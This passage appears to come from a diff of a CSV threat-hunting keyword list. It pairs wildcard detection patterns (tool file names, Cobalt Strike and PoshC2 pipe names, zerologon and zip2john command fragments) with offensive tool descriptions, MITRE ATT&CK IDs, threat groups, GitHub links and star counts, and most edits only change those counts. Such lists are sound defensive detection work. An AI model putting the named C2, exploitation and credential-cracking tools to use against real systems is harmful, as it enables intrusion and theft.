- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" -"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ZeroLogon-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon-restore * -target-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ZeroLogonScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" @@ -18623,25 +18812,25 @@ "*Ziconius/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*ziiiiizzzb*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*ziiiiizzzib*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*Zloader-FCVP*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zoom1.msi.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zoom2.dll.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zsh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1349","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" +"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1350","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" "*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "*ZXZpZGVuY2UuZmJpLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "*zzzteph/weakpass*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Zzzz Zzzzz Zzzz....*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "./CVE-20* -*","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" "./radare *","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" -".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "/adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" @@ -18674,18 +18863,18 @@ "\\Winsock2\CatalogChangeListener-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\wkssvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" -"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "\kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" 